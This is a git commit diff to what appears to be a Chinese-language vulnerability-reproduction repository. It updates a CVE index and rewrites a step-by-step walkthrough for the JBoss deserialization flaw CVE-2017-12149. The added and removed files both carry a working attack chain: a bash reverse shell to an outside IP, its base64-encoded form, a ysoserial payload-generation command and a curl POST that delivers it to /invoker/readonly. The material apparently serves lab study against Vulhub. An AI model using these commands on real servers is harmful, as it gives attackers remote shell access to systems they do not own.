update

2025-11-05 10:50:23 +00:00 · 2025-08-18 10:40:54 +08:00 · 2025-08-18 10:40:54 +08:00 · 11803fdc55
commit 11803fdc55
parent 5502415f0f
13 changed files with 559 additions and 542 deletions
--- a/README.md
+++ b/README.md
@ -656,7 +656,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
  * GoAhead Server 远程命令执行漏洞 CVE-2017-17562
  * GoCD plugin 任意文件读取漏洞 CVE-2021-43287
  * JBoss 4.x JBossMQ JMS 反序列化漏洞 CVE-2017-7504
-  * JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149
+  * JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149
  * JBoss JMXInvokerServlet 反序列化漏洞 CVE-2015-7501
  * Jenkins checkScript 远程命令执行漏洞 CVE-2018-1000861
  * Jenkins CLI 接口任意文件读取漏洞 CVE-2024-23897
@ -793,6 +793,7 @@ _Disclaimer: The technologies, concepts, and tools provided in this Git reposito
  * Apache Commons Configuration 远程命令执行漏洞 CVE-2022-33980
  * Apache Commons Text 远程代码执行漏洞 CVE-2022-42889
  * Apache CXF Aegis DataBinding 服务端请求伪造漏洞 CVE-2024-28752
  * Apache Dubbo Hessian 反序列化漏洞 CVE-2020-1948
  * Apache Dubbo Java反序列化漏洞 CVE-2019-17564
  * Apache Flink 小于1.9.1远程代码执行 CVE-2020-17518
--- a/中间件漏洞/JBoss
+++ b/中间件漏洞/JBoss
@ -0,0 +1,63 @@
 # JBoss 5.x 6.x 反序列化漏洞 CVE-2017-12149
 ## 漏洞描述
 该漏洞为 Java 反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。
 参考：
 - https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
 - https://access.redhat.com/security/cve/cve-2017-12149
 ## 环境搭建
 Vulhub 执行以下命令启动一个 Jboss 6.0 的应用：
 ```
 docker-compose up -d
 ```
 首次执行时会有 1~3 分钟时间初始化，初始化完成后访问 `http://your-ip:8080/` 即可看到 JBoss 默认页面。
 ![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250813161006310.png)
 ## 漏洞复现
 该漏洞出现在 `/invoker/readonly` 请求中，服务器将用户提交的 POST 内容进行了 Java 反序列化：
 ![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250813175008227.png)
 所以，我们用常规 Java 反序列化漏洞测试方法来复现该漏洞。
 ### 编写反弹 shell 的命令
 我们使用 bash 来反弹 shell，但由于 `Runtime.getRuntime().exec()` 中不能使用管道符等 bash 需要的方法，我们需要用进行一次编码。
 ```
 bash -i >& /dev/tcp/10.8.0.1/21 0>&1
 # base64 编码
 bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMS8yMSAwPiYx} | {base64,-d} | {bash,-i}
 ```
 ### 序列化数据生成
 使用 [ysoserial](https://github.com/frohoff/ysoserial) 来复现生成序列化数据，由于 Vulhub 使用的 Java 版本较新，所以选择使用的 gadget 是 CommonsCollections5：
 ```
 java -jar ysoserial-all.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC44LjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
 ```
 ### 发送 POC
 生成好的 POC 即为 `poc.ser`，将这个文件作为 POST Body 发送至 `/invoker/readonly` 即可：
 ```
 curl -v POST http://your-ip:8080/invoker/readonly -H 'Content-Type: application/data' --data-binary @poc.ser
 ```
 ![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250814091229978.png)
 监听 21 端口，接收反弹 shell：
 ![](images/JBoss%205.x%206.x%20反序列化漏洞%20CVE-2017-12149/image-20250813173917758.png)
--- a/中间件漏洞/JBoss
+++ b/中间件漏洞/JBoss
@ -1,52 +0,0 @@
 # JBoss 5.x6.x 反序列化漏洞 CVE-2017-12149
 ## 漏洞描述
 该漏洞为 Java反序列化错误类型，存在于 Jboss 的 HttpInvoker 组件中的 ReadOnlyAccessFilter 过滤器中。该过滤器在没有进行任何安全检查的情况下尝试将来自客户端的数据流进行反序列化，从而导致了漏洞。
 参考：
 - https://mp.weixin.qq.com/s/zUJMt9hdGoz1TEOKy2Cgdg
 - https://access.redhat.com/security/cve/cve-2017-12149
 ## 环境搭建
 Vulhub运行测试环境
 ```
 docker-compose up -d
 ```
 首次执行时会有1~3分钟时间初始化，初始化完成后访问`http://your-ip:8080/`即可看到JBoss默认页面。
 ## 漏洞复现
 该漏洞出现在`/invoker/readonly`请求中，服务器将用户提交的POST内容进行了Java反序列化：
 ![image-20230328155952101](images/image-20230328155952101.png)
 所以，我们用常规Java反序列化漏洞测试方法来复现该漏洞。
 ### 编写反弹shell的命令
 我们使用bash来反弹shell，但由于`Runtime.getRuntime().exec()`中不能使用管道符等bash需要的方法，我们需要用进行一次编码。
 ![image-20230328160010674](images/image-20230328160010674.png)
 ### 序列化数据生成
 使用[ysoserial](https://github.com/frohoff/ysoserial)来复现生成序列化数据，由于Vulhub使用的Java版本较新，所以选择使用的gadget是CommonsCollections5：
 ```
 java -jar ysoserial.jar CommonsCollections5 "bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4wLjAuMS8yMSAwPiYx}|{base64,-d}|{bash,-i}" > poc.ser
 ```
 ### 发送POC
 生成好的POC即为poc.ser，将这个文件作为POST Body发送至/invoker/readonly即可：
 ![image-20230328160034054](images/image-20230328160034054.png)
 成功反弹shell：
 ![image-20230328160045518](images/image-20230328160045518.png)
--- a/中间件漏洞/Jenkins-CI
+++ b/中间件漏洞/Jenkins-CI
@ -2,9 +2,14 @@
 ## 漏洞描述
-攻击者可以将序列化的 Java SignedObject 对象，传输到基于远程处理的 Jenkins CLI，这将最终造成反序列化，进而绕过现有基于黑名单的保护机制。
+Jenkins 是一个广泛使用的开源自动化服务器。
-参考阅读 https://blogs.securiteam.com/index.php/archives/3171
+Jenkins 2.56 及更早版本以及 2.46.1 LTS 及更早版本存在未授权的远程代码执行漏洞。这个未经身份验证的远程代码执行漏洞允许攻击者向 Jenkins CLI 传输序列化的 Java `SignedObject` 对象，该对象会使用新的 `ObjectInputStream` 进行反序列化，从而绕过现有的基于黑名单的保护机制。
 参考链接：
 - [https://www.jenkins.io/security/advisory/2017-04-26/](https://www.jenkins.io/security/advisory/2017-04-26/)
 - [https://www.exploit-db.com/exploits/41965](https://www.exploit-db.com/exploits/41965)
 ## 环境搭建
@ -14,7 +19,7 @@ Vulhub 执行如下命令启动 jenkins 2.46.1：
 docker-compose up -d
 ```
-等待完全启动成功后，访问 `http://your-ip:8080` 即可看到 jenkins 已成功运行，无需手工安装。
+等待服务器完全启动成功后，访问 `http://your-ip:8080` 即可看到 jenkins 已成功运行，无需手工安装。
 ## 漏洞复现
--- a/CVE-2017-12149/image-20250813161006310.png
+++ b/CVE-2017-12149/image-20250813161006310.png
--- a/CVE-2017-12149/image-20250813173917758.png
+++ b/CVE-2017-12149/image-20250813173917758.png
--- a/CVE-2017-12149/image-20250813175008227.png
+++ b/CVE-2017-12149/image-20250813175008227.png
--- a/CVE-2017-12149/image-20250814091229978.png
+++ b/CVE-2017-12149/image-20250814091229978.png
--- a/中间件漏洞/images/image-20230328155952101.png
+++ b/中间件漏洞/images/image-20230328155952101.png
--- a/中间件漏洞/images/image-20230328160010674.png
+++ b/中间件漏洞/images/image-20230328160010674.png
--- a/中间件漏洞/images/image-20230328160034054.png
+++ b/中间件漏洞/images/image-20230328160034054.png
--- a/中间件漏洞/images/image-20230328160045518.png
+++ b/中间件漏洞/images/image-20230328160045518.png